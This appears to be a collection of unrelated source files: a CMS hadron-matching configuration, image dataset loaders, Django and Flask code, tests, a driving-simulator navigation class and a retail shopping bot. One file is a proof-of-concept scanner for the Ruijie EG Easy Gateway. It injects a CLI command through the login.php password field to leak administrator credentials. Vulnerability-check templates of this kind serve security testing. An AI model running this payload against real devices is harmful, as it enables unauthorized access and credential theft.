# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/MINIAODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/00D2A247-2910-E511-9F3D-0CC47A4DEDD2.root',
),
skipEvents = cms.untracked.uint32(0)
)
## define maximal number of events to loop over
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# Setting input particle/jet collections to be used by the tools
genParticleCollection = ''
genJetCollection = 'ak4GenJetsCustom'
if options.runOnAOD:
genParticleCollection = 'genParticles'
## producing a subset of genParticles to be used for jet reclustering
from RecoJets.Configuration.GenJetParticles_cff import genParticlesForJetsNoNu
process.genParticlesForJetsCustom = genParticlesForJetsNoNu.clone(
src = genParticleCollection
)
patAlgosToolsTask.add(process.genParticlesForJetsCustom)
# Producing own jets for testing purposes
from RecoJets.JetProducers.ak4GenJets_cfi import ak4GenJets
process.ak4GenJetsCustom = ak4GenJets.clone(
src = 'genParticlesForJetsCustom',
rParam = cms.double(0.4),
jetAlgorithm = cms.string("AntiKt")
)
patAlgosToolsTask.add(process.ak4GenJetsCustom)
else:
genParticleCollection = 'prunedGenParticles'
genJetCollection = 'slimmedGenJets'
# Supplies PDG ID to real name resolution of MC particles
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
# Ghost particle collection used for Hadron-Jet association
# MUST use proper input particle collection
from PhysicsTools.JetMCAlgos.HadronAndPartonSelector_cfi import selectedHadronsAndPartons
process.selectedHadronsAndPartons = selectedHadronsAndPartons.clone(
particles = genParticleCollection
)
patAlgosToolsTask.add(process.selectedHadronsAndPartons)
# Input particle collection for matching to gen jets (partons + leptons)
# MUST use use proper input jet collection: the jets to which hadrons should be associated
# rParam and jetAlgorithm MUST match those used for jets to be associated with hadrons
# More details on the tool: https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideBTagMCTools#New_jet_flavour_definition
from PhysicsTools.JetMCAlgos.AK4PFJetsMCFlavourInfos_cfi import ak4JetFlavourInfos
process.genJetFlavourInfos = ak4JetFlavourInfos.clone(
jets = genJetCollection,
)
patAlgosToolsTask.add(process.genJetFlavourInfos)
# Plugin for analysing B hadrons
# MUST use the same particle collection as in selectedHadronsAndPartons
from PhysicsTools.JetMCAlgos.GenHFHadronMatcher_cff import matchGenBHadron
process.matchGenBHadron = matchGenBHadron.clone(
genParticles = genParticleCollection,
jetFlavourInfos = "genJetFlavourInfos"
)
patAlgosToolsTask.add(process.matchGenBHadron)
# Plugin for analysing C hadrons
# MUST use the same particle collection as in selectedHadronsAndPartons
from PhysicsTools.JetMCAlgos.GenHFHadronMatcher_cff import matchGenCHadron
process.matchGenCHadron = matchGenCHadron.clone(
genParticles = genParticleCollection,
jetFlavourInfos = "genJetFlavourInfos"
)
patAlgosToolsTask.add(process.matchGenCHadron)
## configuring the testing analyzer that produces output tree
process.matchGenHFHadrons = cms.EDAnalyzer("matchGenHFHadrons",
# phase space of jets to be stored
genJetPtMin = cms.double(20),
genJetAbsEtaMax = cms.double(2.4),
# input tags holding information about matching
genJets = cms.InputTag(genJetCollection),
genBHadJetIndex = cms.InputTag("matchGenBHadron", "genBHadJetIndex"),
genBHadFlavour = cms.InputTag("matchGenBHadron", "genBHadFlavour"),
genBHadFromTopWeakDecay = cms.InputTag("matchGenBHadron", "genBHadFromTopWeakDecay"),
genBHadPlusMothers = cms.InputTag("matchGenBHadron", "genBHadPlusMothers"),
genBHadPlusMothersIndices = cms.InputTag("matchGenBHadron", "genBHadPlusMothersIndices"),
genBHadIndex = cms.InputTag("matchGenBHadron", "genBHadIndex"),
genBHadLeptonHadronIndex = cms.InputTag("matchGenBHadron", "genBHadLeptonHadronIndex"),
genBHadLeptonViaTau = cms.InputTag("matchGenBHadron", "genBHadLeptonViaTau"),
genCHadJetIndex = cms.InputTag("matchGenCHadron", "genCHadJetIndex"),
genCHadFlavour = cms.InputTag("matchGenCHadron", "genCHadFlavour"),
genCHadFromTopWeakDecay = cms.InputTag("matchGenCHadron", "genCHadFromTopWeakDecay"),
genCHadBHadronId = cms.InputTag("matchGenCHadron", "genCHadBHadronId"),
genCHadPlusMothers = cms.InputTag("matchGenCHadron", "genCHadPlusMothers"),
genCHadPlusMothersIndices = cms.InputTag("matchGenCHadron", "genCHadPlusMothersIndices"),
genCHadIndex = cms.InputTag("matchGenCHadron", "genCHadIndex"),
genCHadLeptonHadronIndex = cms.InputTag("matchGenCHadron", "genCHadLeptonHadronIndex"),
genCHadLeptonViaTau = cms.InputTag("matchGenCHadron", "genCHadLeptonViaTau"),
)
## setting up output root file
process.TFileService = cms.Service("TFileService",
fileName = cms.string("matchGenHFHadrons_trees.root")
)
## defining only the final modules to run: dependencies will be run automatically [allowUnscheduled = True]
process.p1 = cms.Path(
process.matchGenHFHadrons
)
## module to store raw output from the processed modules into the ROOT file
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('matchGenHFHadrons_out.root'),
outputCommands = cms.untracked.vstring('drop *', 'keep *_matchGen*_*_*')
)
process.outpath = cms.EndPath(process.out, patAlgosToolsTask)
|
157283
|
import os
import torch
from torchvision import transforms
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
def get_domains(dataset_name):
return globals()[dataset_name].DOMAINS
class ImageDataset(torch.utils.data.Dataset):
def __init__(self, file_path, image_dir, transform=None):
self.file_path = file_path
self.image_dir = image_dir
self.transform = transform
self.image_paths = []
self.labels = []
self._read_file()
def __len__(self):
return len(self.image_paths)
def __getitem__(self, idx):
path = os.path.join(self.image_dir, self.image_paths[idx])
with open(path, 'rb') as f:
image = Image.open(f).convert('RGB')
label = self.labels[idx]
if self.transform is not None:
image = self.transform(image)
return image, label
def _read_file(self):
with open(self.file_path) as f:
for line in f:
path, label = line.strip().split(',')
self.image_paths.append(path)
self.labels.append(int(label) - 1)
class MultiDomainDataset:
def __init__(self, root_dir, test_dom_idx):
images_dir = os.path.join(root_dir, 'images')
split_dir = os.path.join(root_dir, 'split')
domains = [f.name for f in os.scandir(images_dir) if f.is_dir()]
domains.sort()
test_dom = domains[test_dom_idx]
train_doms = [d for d in domains if d != test_dom]
transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
train_datasets, val_datasets = [], []
for dom_name in train_doms:
train_datasets.append(ImageDataset(
os.path.join(split_dir, dom_name + '_train.txt'),
images_dir,
transform))
val_datasets.append(ImageDataset(
os.path.join(split_dir, dom_name + '_val.txt'),
images_dir,
transform))
self.datasets = {}
self.datasets['train'] = train_datasets
self.datasets['val'] = torch.utils.data.ConcatDataset(val_datasets)
self.datasets['test'] = ImageDataset(
os.path.join(split_dir, test_dom + '_test.txt'),
images_dir,
transform)
def __getitem__(self, phase):
if phase in ['train', 'val', 'test']:
return self.datasets[phase]
else:
raise ValueError
class VLCS(MultiDomainDataset):
N_CLASSES = 5
DOMAINS = ['C', 'L', 'S', 'V']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'VLCS/')
super().__init__(self.root_dir, test_dom_idx)
class PACS(MultiDomainDataset):
N_CLASSES = 7
DOMAINS = ['A', 'C', 'P', 'S']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'PACS/')
super().__init__(self.root_dir, test_dom_idx)
class OfficeHome(MultiDomainDataset):
N_CLASSES = 65
DOMAINS = ['A', 'C', 'P', 'R']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'OfficeHome/')
super().__init__(self.root_dir, test_dom_idx)
|
157311
|
from django import forms
from django.forms.extras.widgets import SelectDateWidget
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.3, 2.4 fallback.
import models
from django.forms.widgets import RadioSelect, CheckboxSelectMultiple
from systems.models import Allocation, SystemStatus, OperatingSystem
from core.site.models import Site
class MultiSelectFormField(forms.MultipleChoiceField):
widget = forms.CheckboxSelectMultiple
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super(MultiSelectFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if not value and self.required:
raise forms.ValidationError(self.error_messages['required'])
if value and self.max_choices and len(value) > self.max_choices:
raise forms.ValidationError('You must select a maximum of %s choice%s.'
% (apnumber(self.max_choices), pluralize(self.max_choices)))
return value
class ReportForm(forms.Form):
system_type = MultiSelectFormField(
required=True,
choices=[
('SYSTEM', 'SYSTEM'),
#('UNMANAGED', 'UNMANAGED'),
] )
output = forms.ChoiceField(
required=False,
choices=[
('SCREEN', 'SCREEN'),
('CSV', 'CSV'),
] )
system_status = forms.MultipleChoiceField(
required=False,
widget=CheckboxSelectMultiple(attrs={'class': 'system_status'}),
choices=[('-1', 'All')] + [(m.id, m) for m in SystemStatus.objects.all()])
site = forms.MultipleChoiceField(
required=False,
widget=CheckboxSelectMultiple(attrs={'class': 'system_site'}),
choices=[('-1', 'All')] + [(m.id, m) for m in Site.objects.all()])
allocation = forms.ChoiceField(
required=False,
choices=[('', 'All')] + [(m.id, m)
for m in Allocation.objects.all()])
operating_system = forms.CharField(
max_length=72,
required = False
)
server_models = forms.CharField(
max_length=72,
required = False
)
|
157312
|
from PIL import Image
from numpy import *
from scipy.ndimage import measurements,morphology
"""
This is the morphology counting objects example in Section 1.4.
"""
# load image and threshold to make sure it is binary
im = array(Image.open('../data/houses.png').convert('L'))
im = (im<128)
labels, nbr_objects = measurements.label(im)
print "Number of objects:", nbr_objects
# morphology - opening to separate objects better
im_open = morphology.binary_opening(im,ones((9,5)),iterations=2)
labels_open, nbr_objects_open = measurements.label(im_open)
print "Number of objects:", nbr_objects_open
|
157333
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Ruijie EG Easy Gateway Password Leak''',
"description": '''Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability''',
"severity": "high",
"references": [
"http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html",
"https://www.ruijienetworks.com"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["ruijie", "exposure"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/login.php"""
method = "POST"
data = """username=admin&password=<PASSWORD>?show+webmaster+user"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""data":""" in resp0.text and """status":1""" in resp0.text and """admin""" in resp0.text) and ("""text/json""" in str(resp0.headers)) and (resp0.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
157335
|
from functools import partial
from mkreports.md import MdProxy
def test_md_proxy(page_info):
md_proxy = MdProxy(page_info=page_info, md_defaults=dict(Table=dict(max_rows=1000)))
test_table = md_proxy.Table
assert isinstance(test_table, partial)
assert test_table.keywords["max_rows"] == 1000
|
157364
|
import logging
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
import numpy as np
from panda3d.core import TransparencyAttrib, LineSegs, NodePath
from metadrive.component.lane.circular_lane import CircularLane
from metadrive.component.map.base_map import BaseMap
from metadrive.component.pgblock.first_block import FirstPGBlock
from metadrive.component.road_network import Road
from metadrive.constants import RENDER_MODE_ONSCREEN, CamMask
from metadrive.engine.asset_loader import AssetLoader
from metadrive.utils import clip, norm, get_np_random
from metadrive.utils.coordinates_shift import panda_position
from metadrive.utils.scene_utils import ray_localization
from metadrive.utils.space import Parameter, BlockParameterSpace
class BaseNavigation:
navigation_info_dim = 10
NAVI_POINT_DIST = 50
PRE_NOTIFY_DIST = 40
MIN_ALPHA = 0.15
CKPT_UPDATE_RANGE = 5
FORCE_CALCULATE = False
LINE_TO_DEST_HEIGHT = 0.6
def __init__(
self,
engine,
show_navi_mark: bool = False,
random_navi_mark_color=False,
show_dest_mark=False,
show_line_to_dest=False
):
"""
This class define a helper for localizing vehicles and retrieving navigation information.
It now only support from first block start to the end node, but can be extended easily.
"""
self.map = None
self.checkpoints = None
self._target_checkpoints_index = None
self.current_ref_lanes = None
self.next_ref_lanes = None
self.final_lane = None
self.current_lane = None
self._navi_info = np.zeros((self.navigation_info_dim, ), dtype=np.float32) # navi information res
# Vis
self._show_navi_info = (engine.mode == RENDER_MODE_ONSCREEN and not engine.global_config["debug_physics_world"])
self.origin = NodePath("navigation_sign") if self._show_navi_info else None
self.navi_mark_color = (0.6, 0.8, 0.5) if not random_navi_mark_color else get_np_random().rand(3)
self.navi_arrow_dir = [0, 0]
self._dest_node_path = None
self._goal_node_path = None
self._line_to_dest = None
self._show_line_to_dest = show_line_to_dest
if self._show_navi_info:
# nodepath
self._line_to_dest = self.origin.attachNewNode("line")
self._goal_node_path = self.origin.attachNewNode("target")
self._dest_node_path = self.origin.attachNewNode("dest")
if show_navi_mark:
navi_point_model = AssetLoader.loader.loadModel(AssetLoader.file_path("models", "box.bam"))
navi_point_model.reparentTo(self._goal_node_path)
if show_dest_mark:
dest_point_model = AssetLoader.loader.loadModel(AssetLoader.file_path("models", "box.bam"))
dest_point_model.reparentTo(self._dest_node_path)
if show_line_to_dest:
line_seg = LineSegs("line_to_dest")
line_seg.setColor(self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7)
line_seg.setThickness(2)
self._dynamic_line_np = NodePath(line_seg.create(True))
self._dynamic_line_np.reparentTo(self.origin)
self._line_to_dest = line_seg
self._goal_node_path.setTransparency(TransparencyAttrib.M_alpha)
self._dest_node_path.setTransparency(TransparencyAttrib.M_alpha)
self._goal_node_path.setColor(
self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7
)
self._dest_node_path.setColor(
self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7
)
self._goal_node_path.hide(CamMask.AllOn)
self._dest_node_path.hide(CamMask.AllOn)
self._goal_node_path.show(CamMask.MainCam)
self._dest_node_path.show(CamMask.MainCam)
logging.debug("Load Vehicle Module: {}".format(self.__class__.__name__))
def reset(self, map: BaseMap, current_lane):
self.map = map
self.current_lane = current_lane
def set_route(self, current_lane_index: str, destination: str):
"""
Find a shortest path from start road to end road
:param current_lane_index: start road node
:param destination: end road node or end lane index
:return: None
"""
raise NotImplementedError
def update_localization(self, ego_vehicle):
"""
It is called every step
"""
raise NotImplementedError
def _get_info_for_checkpoint(self, lanes_id, ref_lane, ego_vehicle):
navi_information = []
# Project the checkpoint position into the target vehicle's coordination, where
# +x is the heading and +y is the right hand side.
later_middle = (float(self.get_current_lane_num()) / 2 - 0.5) * self.get_current_lane_width()
check_point = ref_lane.position(ref_lane.length, later_middle)
dir_vec = check_point - ego_vehicle.position # get the vector from center of vehicle to checkpoint
dir_norm = norm(dir_vec[0], dir_vec[1])
if dir_norm > self.NAVI_POINT_DIST: # if the checkpoint is too far then crop the direction vector
dir_vec = dir_vec / dir_norm * self.NAVI_POINT_DIST
ckpt_in_heading, ckpt_in_rhs = ego_vehicle.projection(dir_vec) # project to ego vehicle's coordination
# Dim 1: the relative position of the checkpoint in the target vehicle's heading direction.
navi_information.append(clip((ckpt_in_heading / self.NAVI_POINT_DIST + 1) / 2, 0.0, 1.0))
# Dim 2: the relative position of the checkpoint in the target vehicle's right hand side direction.
navi_information.append(clip((ckpt_in_rhs / self.NAVI_POINT_DIST + 1) / 2, 0.0, 1.0))
if lanes_id == 0:
lanes_heading = ref_lane.heading_theta_at(ref_lane.local_coordinates(ego_vehicle.position)[0])
else:
lanes_heading = ref_lane.heading_theta_at(min(self.PRE_NOTIFY_DIST, ref_lane.length))
# Try to include the current lane's information into the navigation information
bendradius = 0.0
dir = 0.0
angle = 0.0
if isinstance(ref_lane, CircularLane):
bendradius = ref_lane.radius / (
BlockParameterSpace.CURVE[Parameter.radius].max +
self.get_current_lane_num() * self.get_current_lane_width()
)
dir = ref_lane.direction
if dir == 1:
angle = ref_lane.end_phase - ref_lane.start_phase
elif dir == -1:
angle = ref_lane.start_phase - ref_lane.end_phase
# Dim 3: The bending radius of current lane
navi_information.append(clip(bendradius, 0.0, 1.0))
# Dim 4: The bending direction of current lane (+1 for clockwise, -1 for counterclockwise)
navi_information.append(clip((dir + 1) / 2, 0.0, 1.0))
# Dim 5: The angular difference between the heading in lane ending position and
# the heading in lane starting position
navi_information.append(
clip((np.rad2deg(angle) / BlockParameterSpace.CURVE[Parameter.angle].max + 1) / 2, 0.0, 1.0)
)
return navi_information, lanes_heading, check_point
def _update_target_checkpoints(self, ego_lane_index, ego_lane_longitude):
raise NotImplementedError
def get_navi_info(self):
return self._navi_info
def destroy(self):
if self._show_navi_info:
try:
self._line_to_dest.removeNode()
except AttributeError:
pass
self._dest_node_path.removeNode()
self._goal_node_path.removeNode()
self.next_ref_lanes = None
self.current_ref_lanes = None
def set_force_calculate_lane_index(self, force: bool):
self.FORCE_CALCULATE = force
def __del__(self):
logging.debug("{} is destroyed".format(self.__class__.__name__))
def get_current_lateral_range(self, current_position, engine) -> float:
raise NotImplementedError
def get_current_lane_width(self) -> float:
return self.current_lane.width
def get_current_lane_num(self) -> float:
return len(self.current_ref_lanes)
def _get_current_lane(self, ego_vehicle):
"""
Called in update_localization to find current lane information
"""
possible_lanes = ray_localization(
ego_vehicle.heading, ego_vehicle.position, ego_vehicle.engine, return_all_result=True
)
for lane, index, l_1_dist in possible_lanes:
if lane in self.current_ref_lanes:
return lane, index
nx_ckpt = self._target_checkpoints_index[-1]
if nx_ckpt == self.checkpoints[-1] or self.next_ref_lanes is None:
return possible_lanes[0][:-1] if len(possible_lanes) > 0 else (None, None)
if self.map.road_network_type == NodeRoadNetwork:
nx_nx_ckpt = nx_ckpt + 1
next_ref_lanes = self.map.road_network.graph[self.checkpoints[nx_ckpt]][self.checkpoints[nx_nx_ckpt]]
else:
next_ref_lanes = self.next_ref_lanes
for lane, index, l_1_dist in possible_lanes:
if lane in next_ref_lanes:
return lane, index
return possible_lanes[0][:-1] if len(possible_lanes) > 0 else (None, None)
def _update_current_lane(self, ego_vehicle):
lane, lane_index = self._get_current_lane(ego_vehicle)
if lane is None:
lane, lane_index = ego_vehicle.lane, ego_vehicle.lane_index
ego_vehicle.on_lane = False
if self.FORCE_CALCULATE:
lane_index, _ = self.map.road_network.get_closest_lane_index(ego_vehicle.position)
lane = self.map.road_network.get_lane(lane_index)
self.current_lane = lane
assert lane_index == lane.index, "lane index mismatch!"
return lane, lane_index
def _ray_lateral_range(self, engine, start_position, dir, length=50):
"""
It is used to measure the lateral range of special blocks
:param start_position: start_point
:param dir: ray direction
:param length: length of ray
:return: lateral range [m]
"""
end_position = start_position[0] + dir[0] * length, start_position[1] + dir[1] * length
start_position = panda_position(start_position, z=0.15)
end_position = panda_position(end_position, z=0.15)
mask = FirstPGBlock.CONTINUOUS_COLLISION_MASK
res = engine.physics_world.static_world.rayTestClosest(start_position, end_position, mask=mask)
if not res.hasHit():
return length
else:
return res.getHitFraction() * length
def _draw_line_to_dest(self, start_position, end_position):
if not self._show_line_to_dest:
return
line_seg = self._line_to_dest
line_seg.moveTo(panda_position(start_position, self.LINE_TO_DEST_HEIGHT))
line_seg.drawTo(panda_position(end_position, self.LINE_TO_DEST_HEIGHT))
self._dynamic_line_np.removeNode()
self._dynamic_line_np = NodePath(line_seg.create(False))
self._dynamic_line_np.hide(CamMask.Shadow | CamMask.RgbCam)
self._dynamic_line_np.reparentTo(self.origin)
def detach_from_world(self):
if isinstance(self.origin, NodePath):
self.origin.detachNode()
def attach_to_world(self, engine):
if isinstance(self.origin, NodePath):
self.origin.reparentTo(engine.render)
|
157380
|
from importlib import import_module
import celery
from girder_worker_utils import decorators
import six
from stevedore import extension
#: Defines the namespace used for plugin entrypoints
NAMESPACE = 'girder_worker_plugins'
def _handle_entrypoint_errors(mgr, entrypoint, exc):
raise exc
def get_extension_manager(app=None):
"""Get an extension manager for the plugin namespace."""
if app is None:
app = celery.current_app
return extension.ExtensionManager(
namespace=NAMESPACE,
invoke_on_load=True,
invoke_args=(app,),
on_load_failure_callback=_handle_entrypoint_errors
)
def get_plugin_task_modules(app=None):
"""Return task modules defined by plugins."""
includes = []
for ext in get_extension_manager(app=app):
includes.extend(ext.obj.task_imports())
return includes
def import_all_includes():
"""Import all task modules for their side-effects."""
for module in get_plugin_task_modules():
import_module(module)
def get_extensions(app=None):
"""Get a list of installed extensions."""
return [ext.name for ext in get_extension_manager(app)]
def get_module_tasks(module_name):
"""Get all tasks defined in a python module.
:param str module_name: The importable module name
"""
module = import_module(module_name)
tasks = {}
if module is None:
return tasks
for name, func in six.iteritems(vars(module)):
full_name = '%s.%s' % (module_name, name)
if not hasattr(func, '__call__'):
# filter out objects that are not callable
continue
try:
decorators.get_description_attribute(func)
tasks[full_name] = func
except decorators.MissingDescriptionException:
pass
return tasks
def get_extension_tasks(extension, app=None, celery_only=False):
"""Get the tasks defined by a girder_worker extension.
:param str extension: The extension name
:param app: The celery app instance
:param bool celery_only: If true, only return celery tasks
"""
manager = get_extension_manager(app)
imports = manager[extension].obj.task_imports()
tasks = {}
for module_name in imports:
tasks.update(get_module_tasks(module_name))
if celery_only: # filter celery tasks
if app is None:
from .app import app
tasks = {
key: tasks[key] for key in tasks if key in app.tasks
}
return tasks
def discover_tasks(app):
app.conf.update({
'CELERY_INCLUDE': get_plugin_task_modules()
})
|
157388
|
from unittest.mock import MagicMock
import bspump.unittest
import bspump.common
class TestStringToBytesParser(bspump.unittest.ProcessorTestCase):
def test_string_to_bytes_parser(self):
events = {
(None, 'some string'),
(None, 'another string'),
(None, 'last string'),
}
self.set_up_processor(bspump.common.StringToBytesParser)
output = self.execute(
events
)
self.assertEqual(
sorted([event for context, event in output]),
[b"another string", b"last string", b"some string"]
)
def test_event_not_string(self):
events = [
(None, b"Not a string"),
]
self.set_up_processor(bspump.common.StringToBytesParser)
output = self.execute(events)
self.assertTrue(self.Pipeline.is_error())
self.assertEqual(
[event for context, event in output],
[]
)
class TestBytesToStringParser(bspump.unittest.ProcessorTestCase):
def test_bytes_to_string_parser(self):
events = {
(None, b'some bytes'),
(None, b'another bytes'),
(None, b'last bytes'),
}
self.set_up_processor(bspump.common.BytesToStringParser)
output = self.execute(
events
)
self.assertListEqual(
sorted([event for context, event in output]),
["another bytes", "last bytes", "some bytes"]
)
def test_event_not_bytes(self):
events = [
(None, "Not a bytes"),
]
self.set_up_processor(bspump.common.BytesToStringParser)
bspump.pipeline.L = MagicMock() # turn off logging
output = self.execute(events)
self.assertTrue(self.Pipeline.is_error())
self.assertEqual(
[event for context, event in output],
[]
)
|
157389
|
import os
from pytorch_pretrained_bert.tokenization import BertTokenizer
import preprocess_pretraining
import torch
from utils import seek_random_offset
from random import random as rand
from random import randint, shuffle
class DataLoader():
""" Load sentence pair from corpus """
def __init__(self, file, batch_size, max_len, short_sampling_prob=0.1):
super().__init__()
self.f_pos = open(file, "r", encoding='utf-8', errors='ignore')
self.f_neg = open(file, "r", encoding='utf-8', errors='ignore')
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.max_len = max_len
self.short_sampling_prob = short_sampling_prob
self.batch_size = batch_size
self.preproc= preprocess_pretraining.PreProcess(max_len*0.15,0.15,max_len)
def read_tokens(self, f, length, discard_last_and_restart=True):
""" Read tokens from file pointer with limited length """
tokens = []
while len(tokens) < length:
line = f.readline()
if not line: # end of file
return None
if not line.strip():
if discard_last_and_restart:
continue
else:
return tokens
tokens.extend(self.tokenizer.tokenize(line.strip()))
return tokens
def __iter__(self): # iterator to load data
while True:
batch = []
for i in range(self.batch_size):
len_tokens = randint(1, int(self.max_len / 2)) \
if rand() < self.short_sampling_prob \
else int(self.max_len / 2)
is_next = rand() < 0.5 # whether token_b is next to token_a or not
tokens_a = self.read_tokens(self.f_pos, len_tokens, True)
seek_random_offset(self.f_neg)
f_next = self.f_pos if is_next else self.f_neg
tokens_b = self.read_tokens(f_next, len_tokens, False)
if tokens_a is None or tokens_b is None:
self.f_pos.seek(0, 0)
return
data = (is_next, tokens_a, tokens_b)
data=self.preproc(data)
batch.append(data)
batch_tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*batch)]
yield batch_tensors
|
157390
|
from django.urls import path
from . import views
from .views import AutoCreate
urlpatterns = [
path('owner/<int:owner_id>/', views.detail),
path('', AutoCreate.as_view())
]
|
157402
|
def login_required(func):
def not_logged_in(self, **kwargs):
self.send_login_required({'signin_required': 'you need to sign in'})
return
def check_user(self, **kwargs):
user = self.connection.user
if not user:
return not_logged_in(self, **kwargs)
return func(self, **kwargs)
return check_user
class RoutePermission(object):
def test_permission(self, handler, verb, **kwargs):
raise NotImplementedError("You need to implement test_permission")
def permission_failed(self, handler):
raise NotImplementedError("You need to implement permission_failed")
class LoginRequired(RoutePermission):
def __init__(self, verbs=None):
self.test_against_verbs = verbs
def test_permission(self, handler, verb, **kwargs):
if not self.test_against_verbs:
return handler.connection.user is not None
if self.test_against_verbs:
if verb not in self.test_against_verbs:
return True
user = handler.connection.user
return user is not None
def permission_failed(self, handler):
handler.send_login_required()
|
157409
|
from flask_restplus import Namespace, reqparse, Resource
from flask import make_response, jsonify
from controller.manager import *
import os
name_space = Namespace("case-runner", description="Case Runner")
runner_param = reqparse.RequestParser()
runner_param.add_argument("status", required=True, type=str, location="json")
runner_param.add_argument("setting_path", required=False, type=str, location="json")
test_list_param = reqparse.RequestParser()
test_list_param.add_argument("file", required=True, type=str, location="json")
resource_param = reqparse.RequestParser()
resource_param.add_argument("file", required=True, type=str, location="json")
resource_param.add_argument("user", required=True, type=str, location="json")
def _get_response(result, message, code):
return make_response(jsonify({"Result": result, "Message": message}), code)
@name_space.route("")
class CaseRunnerApi(Resource):
@name_space.expect(runner_param)
@name_space.response(202, "Case Start Running")
@name_space.response(400, "Wrong Parameters")
def put(self):
arg = runner_param.parse_args()
if arg['status'].lower() == "start":
run_test()
return _get_response(True, "Test Started", 202)
elif arg['status'].lower() == "init":
init_engine()
load_settings(arg['setting_path'])
return _get_response(True, "Test Runner Initialized", 200)
else:
return _get_response(False, "Unknown Status", 400)
@name_space.route("/testlist")
class TestListApi(Resource):
@name_space.response(200, "Load Test List")
@name_space.response(400, "Wrong Parameters")
@name_space.response(500, "Error")
@name_space.expect(test_list_param)
def put(self):
arg = test_list_param.parse_args()
if not os.path.exists(arg['file']):
return _get_response(False, "Test List not found", 500)
try:
load_test_list(arg['file'])
return _get_response(True, "Test List loaded", 200)
except Exception as ex:
return _get_response(False, str(ex), 500)
@name_space.response(200, "Test List")
@name_space.response(500, "Error")
def get(self):
return make_response(jsonify(get_test_list()), 200)
@name_space.route("/resource")
class TestResourceApi(Resource):
@name_space.response(200, "Test Resource Loaded")
@name_space.response(400, "Wrong Parameters")
@name_space.response(500, "Error")
@name_space.expect(resource_param)
def put(self):
arg = resource_param.parse_args()
if not os.path.exists(arg['file']):
return _get_response(False, "Resource File", 500)
try:
load_resource(arg['file'], arg["user"])
return _get_response(True, "Test Resource loaded", 200)
except Exception as ex:
return _get_response(False, str(ex), 500)
|
157419
|
from AMZN import AMZN_BOT
from BSTBUY import BSTBUY_BOT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from dotenv import load_dotenv
from selenium.common.exceptions import WebDriverException
import threading
import time
import os
load_dotenv()
USE_AMZN = os.getenv("USE_AMZN")
USE_BSTBUY = os.getenv("USE_BSTBUY")
# ------------------------------------------
# Webdriver setup
# Webdriver Options
chrome_options = Options()
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
AMZN_DRIVER_PATH = os.getcwd() + "\\chromedriver\\amazon_driver.exe"
BSTBUY_DRIVER_PATH = os.getcwd() + "\\chromedriver\\bstbuy_driver.exe"
try:
AMAZON = AMZN_BOT(webdriver.Chrome(AMZN_DRIVER_PATH, options=chrome_options))
BESTBUY = BSTBUY_BOT(webdriver.Chrome(BSTBUY_DRIVER_PATH, options=chrome_options))
except WebDriverException as err:
print(err)
print("\nPlease download two of the appropriate driver version @\nhttps://sites.google.com/a/chromium.org/chromedriver/downloads\
\nRename one webdriver amazon_driver, and the other bstbuy_driver.")
exit()
# ------------------------------------------
# Functions
# Perform setup for BstBuy & Amzn bots
def setup() :
# If "USE_AMZN" setting is set to True in .env file
if(USE_AMZN) :
AMZN_SETUP_THREAD = threading.Thread(target=AMAZON.setup())
AMZN_SETUP_THREAD.start()
else :
AMAZON.close()
print("[AMAZON] Bot not in use. To fix, change settings in .env file")
# If "USE_BSTBUY" setting is set to True in .env file
if(USE_BSTBUY) :
BSTBUY_SETUP_THREAD = threading.Thread(target=BESTBUY.setup())
BSTBUY_SETUP_THREAD.start()
else :
BESTBUY.close()
print("[BESTBUY] Bot not in use. To fix, change settings in .env file")
# If both bots are set to False in .env file
if ((not USE_AMZN) and (not USE_BSTBUY)) :
print("Both bots set to \"False\" in .env file. Exiting...")
exit()
# Join setup threads
if (USE_AMZN) :
AMZN_SETUP_THREAD.join()
